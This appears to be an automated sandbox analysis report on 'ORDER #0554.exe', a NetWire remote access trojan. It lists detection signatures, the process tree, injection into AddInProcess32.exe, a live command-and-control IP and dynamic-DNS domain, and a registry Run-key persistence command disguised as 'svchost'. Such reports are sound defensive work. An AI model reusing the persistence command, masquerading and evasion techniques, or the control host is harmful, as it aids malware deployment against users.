Play interactive tour

Edit tour

Analysis Report ORDER #0554.exe

Overview

General Information

Sample Name:	ORDER #0554.exe
Analysis ID:	337007
MD5:	73cdb5f235b14379247b9f0e938e24df
SHA1:	26bfbc24c1db50f9c996649bd2eb7c2c8ca11c1e
SHA256:	b2e52f028aaa499f514e7684c6fae9f7db0532cbbce8fbef0234159fbc2e628b
Tags:	exe
Most interesting Screenshot:

Detection

NetWire

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: NetWire

Yara detected NetWire RAT

Allocates memory in foreign processes

Connects to many ports of the same IP (likely port scanning)

Contains functionality to steal Chrome passwords or cookies

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains functionality to launch a process as a different user

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Classification

Startup

System is w10x64

ORDER #0554.exe (PID: 6756 cmdline: 'C:\Users\user\Desktop\ORDER #0554.exe' MD5: 73CDB5F235B14379247B9F0E938E24DF)

cmd.exe (PID: 6856 cmdline: 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'svchost' /t REG_SZ /d 'C:\Users\user\adobe.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 6908 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'svchost' /t REG_SZ /d 'C:\Users\user\adobe.exe' MD5: CEE2A7E57DF2A159A065A34913A055C2)

adobe.exe (PID: 3180 cmdline: 'C:\Users\user\adobe.exe' MD5: 73CDB5F235B14379247B9F0E938E24DF)

AddInProcess32.exe (PID: 4656 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000016.00000002.604899251.0000000004814000.00000004.00000001.sdmp	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
00000016.00000002.605006899.00000000048DD000.00000004.00000001.sdmp	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
00000016.00000002.598003889.0000000002EF9000.00000004.00000001.sdmp	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
00000000.00000002.384637956.000000000474D000.00000004.00000001.sdmp	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
00000000.00000002.384438486.0000000004684000.00000004.00000001.sdmp	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
Process Memory Space: AddInProcess32.exe PID: 4656	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
Process Memory Space: adobe.exe PID: 3180	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
Process Memory Space: ORDER #0554.exe PID: 6756	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
28.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
28.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security

Sigma Overview

System Summary:

Sigma detected: NetWire

Show sources

Source: Registry Key set

Author: Joe Security: Data: Details: JAN, EventID: 13, Image: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, ProcessId: 4656, TargetObject: HKEY_CURRENT_USER\Software\NetWire\HostId

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\adobe.exe

ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Show sources

Source: ORDER #0554.exe

ReversingLabs: Detection: 26%

Source: 28.2.AddInProcess32.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen

Source: ORDER #0554.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: ORDER #0554.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: AddInProcess32.pdb source: ORDER #0554.exe, 00000000.00000003.347000833.0000000007F51000.00000004.00000001.sdmp, AddInProcess32.exe, AddInProcess32.exe.0.dr
Source:	Binary string: AddInProcess32.pdbpw source: ORDER #0554.exe, 00000000.00000003.347000833.0000000007F51000.00000004.00000001.sdmp, AddInProcess32.exe, 0000001C.00000002.593560237.0000000000442000.00000002.00020000.sdmp, AddInProcess32.exe.0.dr

Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then jmp 05220806h	0_2_05220040
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_05227090
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_0522C2C8
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_05225D38
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_05225D38
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then xor edx, edx	0_2_05225C70
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_05224F58
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_0522EE20
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_05225A18
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_05225A18
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then mov esp, ebp	0_2_0522DA18
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_05225527
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then jmp 05220806h	0_2_0522001A
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_0522C2B8
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_05227D20
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_05225D2C
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_05225D2C
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then xor edx, edx	0_2_05225C65
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_0522EE1B
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_05225A0C
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_05225A0C
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 4x nop then mov esp, ebp	0_2_0522DA10
Source: C:\Users\user\adobe.exe	Code function: 4x nop then jmp 054B0806h	22_2_054B0040
Source: C:\Users\user\adobe.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	22_2_054BC2C8
Source: C:\Users\user\adobe.exe	Code function: 4x nop then push dword ptr [ebp-24h]	22_2_054B5D38
Source: C:\Users\user\adobe.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	22_2_054B5D38
Source: C:\Users\user\adobe.exe	Code function: 4x nop then xor edx, edx	22_2_054B5C70
Source: C:\Users\user\adobe.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	22_2_054B4F58
Source: C:\Users\user\adobe.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	22_2_054B6FBC
Source: C:\Users\user\adobe.exe	Code function: 4x nop then push dword ptr [ebp-20h]	22_2_054B5A18
Source: C:\Users\user\adobe.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	22_2_054B5A18
Source: C:\Users\user\adobe.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	22_2_054B5534
Source: C:\Users\user\adobe.exe	Code function: 4x nop then jmp 054B0806h	22_2_054B0006
Source: C:\Users\user\adobe.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	22_2_054B7090
Source: C:\Users\user\adobe.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	22_2_054BC2B8
Source: C:\Users\user\adobe.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	22_2_054B7D6D
Source: C:\Users\user\adobe.exe	Code function: 4x nop then push dword ptr [ebp-24h]	22_2_054B5D2C
Source: C:\Users\user\adobe.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	22_2_054B5D2C
Source: C:\Users\user\adobe.exe	Code function: 4x nop then xor edx, edx	22_2_054B5C65
Source: C:\Users\user\adobe.exe	Code function: 4x nop then push dword ptr [ebp-20h]	22_2_054B5A0C
Source: C:\Users\user\adobe.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	22_2_054B5A0C

Networking:

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 37.120.208.37 ports 3,57438,4,5,7,8

Source: global traffic

TCP traffic: 192.168.2.3:49752 -> 37.120.208.37:57438

Source: Joe Sandbox View

IP Address: 37.120.208.37 37.120.208.37

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 28_2_00405FBE recv,

28_2_00405FBE

Source: unknown

DNS traffic detected: queries for: chongmei33.myddns.rocks

Source: adobe.exe, 00000016.00000002.597326965.00000000012DA000.00000004.00000040.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: AddInProcess32.exe	String found in binary or memory: http://www.yandex.com
Source: ORDER #0554.exe, 00000000.00000002.384637956.000000000474D000.00000004.00000001.sdmp, adobe.exe, 00000016.00000002.604899251.0000000004814000.00000004.00000001.sdmp, AddInProcess32.exe, 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.yandex.comsocks=

System Summary:

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: ORDER #0554.exe

Source: C:\Users\user\adobe.exe

Code function: 22_2_00D251D8 CreateProcessAsUserW,

22_2_00D251D8

Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_0119B91F	0_2_0119B91F
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_01195418	0_2_01195418
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_0119CC49	0_2_0119CC49
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_01194CB0	0_2_01194CB0
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_0119E708	0_2_0119E708
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_011987D8	0_2_011987D8
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_0119AE29	0_2_0119AE29
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_05220040	0_2_05220040
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_05220928	0_2_05220928
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_05229960	0_2_05229960
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_0522C958	0_2_0522C958
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_05226AA0	0_2_05226AA0
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_0522D478	0_2_0522D478
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_0522D488	0_2_0522D488
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_052264E0	0_2_052264E0
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_052264F0	0_2_052264F0
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_0522001A	0_2_0522001A
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_052213F0	0_2_052213F0
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_05226A92	0_2_05226A92
Source: C:\Users\user\Desktop\ORDER #0554.exe	Code function: 0_2_0522DAFD	0_2_0522DAFD
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D20040	22_2_00D20040
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D24048	22_2_00D24048
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D22230	22_2_00D22230
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D21B00	22_2_00D21B00
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D26938	22_2_00D26938
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D21AF0	22_2_00D21AF0
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D24AE8	22_2_00D24AE8
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D20012	22_2_00D20012
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D23810	22_2_00D23810
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D23801	22_2_00D23801
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D24038	22_2_00D24038
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D22221	22_2_00D22221
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D257E0	22_2_00D257E0
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D23398	22_2_00D23398
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D2338A	22_2_00D2338A
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D27558	22_2_00D27558
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D27548	22_2_00D27548
Source: C:\Users\user\adobe.exe	Code function: 22_2_00D26928	22_2_00D26928
Source: C:\Users\user\adobe.exe	Code function: 22_2_0128B91F	22_2_0128B91F
Source: C:\Users\user\adobe.exe	Code function: 22_2_01285418	22_2_01285418
Source: C:\Users\user\adobe.exe	Code function: 22_2_0128CC49	22_2_0128CC49
Source: C:\Users\user\adobe.exe	Code function: 22_2_01284CA1	22_2_01284CA1
Source: C:\Users\user\adobe.exe	Code function: 22_2_0128E708	22_2_0128E708
Source: C:\Users\user\adobe.exe	Code function: 22_2_012887D8	22_2_012887D8
Source: C:\Users\user\adobe.exe	Code function: 22_2_0128AE29	22_2_0128AE29
Source: C:\Users\user\adobe.exe	Code function: 22_2_054BC501	22_2_054BC501
Source: C:\Users\user\adobe.exe	Code function: 22_2_054B0040	22_2_054B0040
Source: C:\Users\user\adobe.exe	Code function: 22_2_054BE060	22_2_054BE060
Source: C:\Users\user\adobe.exe	Code function: 22_2_054B9960	22_2_054B9960
Source: C:\Users\user\adobe.exe	Code function: 22_2_054B0928	22_2_054B0928
Source: C:\Users\user\adobe.exe	Code function: 22_2_054BEA48	22_2_054BEA48
Source: C:\Users\user\adobe.exe	Code function: 22_2_054B6AA0	22_2_054B6AA0
Source: C:\Users\user\adobe.exe	Code function: 22_2_054B64E0	22_2_054B64E0
Source: C:\Users\user\adobe.exe	Code function: 22_2_054B64F0	22_2_054B64F0
Source: C:\Users\user\adobe.exe	Code function: 22_2_054BE051	22_2_054BE051
Source: C:\Users\user\adobe.exe	Code function: 22_2_054B0006	22_2_054B0006
Source: C:\Users\user\adobe.exe	Code function: 22_2_054B13F0	22_2_054B13F0
Source: C:\Users\user\adobe.exe	Code function: 22_2_054BEA3A	22_2_054BEA3A
Source: C:\Users\user\adobe.exe	Code function: 22_2_054B6A92	22_2_054B6A92
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00403047	28_2_00403047
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0041D049	28_2_0041D049
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00419463	28_2_00419463
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00415079	28_2_00415079
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00420420	28_2_00420420
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_004208C0	28_2_004208C0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_004034D3	28_2_004034D3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00414976	28_2_00414976
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00402E68	28_2_00402E68
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00416619	28_2_00416619
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0040AEC6	28_2_0040AEC6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00402AFC	28_2_00402AFC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00415ABF	28_2_00415ABF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00420F40	28_2_00420F40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0041FF50	28_2_0041FF50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0040A728	28_2_0040A728
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00442050	28_2_00442050

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 004081AA appears 110 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 0041F724 appears 31 times

Source: ORDER #0554.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: adobe.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: ORDER #0554.exe	Binary or memory string: OriginalFilename vs ORDER #0554.exe
Source: ORDER #0554.exe, 00000000.00000003.347000833.0000000007F51000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAddInProcess32.exeT vs ORDER #0554.exe
Source: ORDER #0554.exe, 00000000.00000003.350834238.0000000007F78000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNETMEE.exeH vs ORDER #0554.exe
Source: ORDER #0554.exe, 00000000.00000002.381983653.0000000001000000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs ORDER #0554.exe
Source: ORDER #0554.exe, 00000000.00000002.382493023.00000000013A0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSHCore1.dll0 vs ORDER #0554.exe
Source: ORDER #0554.exe, 00000000.00000002.382414346.0000000001290000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs ORDER #0554.exe
Source: ORDER #0554.exe, 00000000.00000002.382414346.0000000001290000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs ORDER #0554.exe
Source: ORDER #0554.exe	Binary or memory string: OriginalFilenameNETMEE.exeH vs ORDER #0554.exe

Source: ORDER #0554.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown

Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'svchost' /t REG_SZ /d 'C:\Users\user\adobe.exe'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/4@1/2

Source: C:\Users\user\Desktop\ORDER #0554.exe

File created: C:\Users\user\adobe.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Mutant created: \Sessions\1\BaseNamedObjects\-

Source: C:\Users\user\Desktop\ORDER #0554.exe

File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Jump to behavior

Source: ORDER #0554.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ORDER #0554.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\adobe.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\ORDER #0554.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ORDER #0554.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: ORDER #0554.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\ORDER #0554.exe

File read: C:\Users\user\Desktop\ORDER #0554.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ORDER #0554.exe 'C:\Users\user\Desktop\ORDER #0554.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'svchost' /t REG_SZ /d 'C:\Users\user\adobe.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'svchost' /t REG_SZ /d 'C:\Users\user\adobe.exe'
Source: unknown	Process created: C:\Users\user\adobe.exe 'C:\Users\user\adobe.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'svchost' /t REG_SZ /d 'C:\Users\user\adobe.exe'	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process created: C:\Users\user\adobe.exe 'C:\Users\user\adobe.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'svchost' /t REG_SZ /d 'C:\Users\user\adobe.exe'	Jump to behavior
Source: C:\Users\user\adobe.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Jump to behavior

Source: C:\Users\user\Desktop\ORDER #0554.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ORDER #0554.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ORDER #0554.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ORDER #0554.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: AddInProcess32.pdb source: ORDER #0554.exe, 00000000.00000003.347000833.0000000007F51000.00000004.00000001.sdmp, AddInProcess32.exe, AddInProcess32.exe.0.dr
Source:	Binary string: AddInProcess32.pdbpw source: ORDER #0554.exe, 00000000.00000003.347000833.0000000007F51000.00000004.00000001.sdmp, AddInProcess32.exe, 0000001C.00000002.593560237.0000000000442000.00000002.00020000.sdmp, AddInProcess32.exe.0.dr

Source: C:\Users\user\adobe.exe	Code function: 22_2_054B512C push 4C00005Eh; ret	22_2_054B5159
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0040DCE9 push ecx; mov dword ptr [esp], 00423976h	28_2_0040DD9F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0040DCE9 push ebp; mov dword ptr [esp], 0042398Ah	28_2_0040DDD9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0040DCE9 push edx; mov dword ptr [esp], 00423997h	28_2_0040DDF7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0040DCE9 push edx; mov dword ptr [esp], esi	28_2_0040E394
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0040A4BC push esi; mov dword ptr [esp], 00423347h	28_2_0040A543
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00409953 push edi; mov dword ptr [esp], 00000091h	28_2_00409980
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00409953 push ebp; mov dword ptr [esp], 00000090h	28_2_0040998D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00411D8C push edx; mov dword ptr [esp], edi	28_2_00412058
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00409E61 push eax; mov dword ptr [esp], ebx	28_2_00409FDE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_00406E04 push ecx; mov dword ptr [esp], ebx	28_2_00406E69
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0040262F push edx; mov dword ptr [esp], edi	28_2_004027C8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0040262F push edx; mov dword ptr [esp], edi	28_2_00402815
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0040262F push edx; mov dword ptr [esp], edi	28_2_004029B2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_004146E1 push eax; mov dword ptr [esp], ebx	28_2_0041470B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 28_2_0040970C push eax; mov dword ptr [esp], 0042B4A0h	28_2_004097B9

Source: C:\Users\user\Desktop\ORDER #0554.exe	File created: C:\Users\user\adobe.exe			Jump to dropped file
Source: C:\Users\user\Desktop\ORDER #0554.exe	File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe			Jump to dropped file

Source: C:\Users\user\Desktop\ORDER #0554.exe

File created: C:\Users\user\adobe.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Users\user\Desktop\ORDER #0554.exe

File created: C:\Users\user\adobe.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\ORDER #0554.exe	File opened: C:\Users\user\Desktop\ORDER #0554.exe\:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Users\user\adobe.exe	File opened: C:\Users\user\adobe.exe\:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\Desktop\ORDER #0554.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

